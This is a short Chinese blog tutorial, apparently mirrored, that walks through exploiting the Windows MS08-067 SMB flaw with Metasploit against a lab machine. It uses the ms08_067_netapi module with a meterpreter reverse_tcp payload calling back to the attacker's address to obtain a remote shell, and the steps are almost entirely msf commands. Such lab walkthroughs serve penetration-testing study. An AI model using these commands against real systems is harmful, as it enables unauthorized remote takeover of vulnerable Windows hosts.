zoukankan      html  css  js  c++  java
  • kali-matasploit

    
    
    1、进入msf终端后,使用search功能搜索ms08-067,发现有一个可用模块:
    
    >msf > search ms08-067
    
    2、使用use命令选定要利用的模块:
    msf > use exploit/windows/smb/ms08_067_netapi
    
    3、设置攻击载荷为基于Windows系统的Meterpreter reverse_tcp 
    
     set PAYLOAD windows/meterpreter/reverse_tcp
    
    4、使用“show targets”命令让我们识别和匹配目标操作系统的类型。
    
    msf exploit(ms08_067_netapi) > show targets 
    
    E
    5、选定系统编号(TARTGET),设置靶机IP(RHOST)与本机IP(LHOST)
    
    msf exploit(ms08_067_netapi) > set TARGET 17
    TARGET => 17
    msf exploit(ms08_067_netapi) > set RHOST 192.168.116.129
    RHOST => 192.168.116.129
    msf exploit(ms08_067_netapi) > set LHOST 192.168.116.128
    LHOST => 192.168.116.128

    6、使用“show options”命令查看当前参数设置情况:
    msf exploit(ms08_067_netapi) >  show option
    
    
     7、参数检查无误后,输入“exploit”对靶机进行攻击。当返回meterpreter提示符表示利用成功。
    msf exploit(ms08_067_netapi) > run
  • 相关阅读:
    安装HDP时的报错信息
    K-近邻(KNN)算法
    linux复杂命令
    azkaban报错记录
    azkaban的安装部署
    安装centOS后要解决的问题
    AI之微信跳一跳
    Python的lambda
    关于在vim中的查找和替换
    cdh6.3.2 hue集成hbase
  • 原文地址:https://www.cnblogs.com/enddark/p/12973933.html
Copyright © 2011-2022 走看看